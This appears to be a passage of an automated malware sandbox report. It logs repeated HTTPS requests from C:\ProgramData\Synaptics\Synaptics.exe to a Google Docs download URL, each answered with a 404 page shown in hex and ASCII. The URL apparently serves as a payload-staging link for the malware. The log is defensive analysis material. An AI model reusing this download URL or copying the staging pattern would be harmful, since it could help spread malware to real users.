                                                                                                                                                                                        2022-05-17 11:31:39 UTC231INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC232INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        76192.168.2.349828142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC229OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC232INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SKWpioILuzPno1V5A8g9jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC233INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC233INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 68 4c 66 42 4e 73 6d 77 6f 5a 78 77 70 55 6b 78 6b 54 77 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jhLfBNsmwoZxwpUkxkTwoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC234INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC235INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        77192.168.2.349830142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC232OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC235INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-C0okGZWD+IKfaeCsOR9TUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC236INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC236INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 6e 58 52 44 61 2b 47 67 4c 64 52 62 2b 30 71 54 57 39 56 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pnXRDa+GgLdRb+0qTW9VrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC237INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC238INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        78192.168.2.349831142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC235OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC238INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cv/4ppURP8Kv7jzOjA5noA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC239INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 65 78 46 54 44 4f 66 7a 71 44 55 69 71 57 34 58 36 67 70 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IexFTDOfzqDUiqW4X6gp5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:39 UTC241INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:39 UTC241INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        79192.168.2.349832142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:39 UTC238OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:39 UTC241INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:39 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-J7N4rmT02FRrx9SAFpdKHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:39 UTC242INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:39 UTC242INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 35 44 51 70 4b 43 75 33 59 62 57 48 47 56 41 6a 47 59 4c 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D5DQpKCu3YbWHGVAjGYLtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:39 UTC244INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:39 UTC244INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        8192.168.2.349743142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC24OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC25INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vgPgSwZm9TyOkviYYPxWuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC26INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 4f 69 67 51 6d 47 63 48 31 72 73 68 4c 4f 56 76 45 46 63 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NOigQmGcH1rshLOVvEFcQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
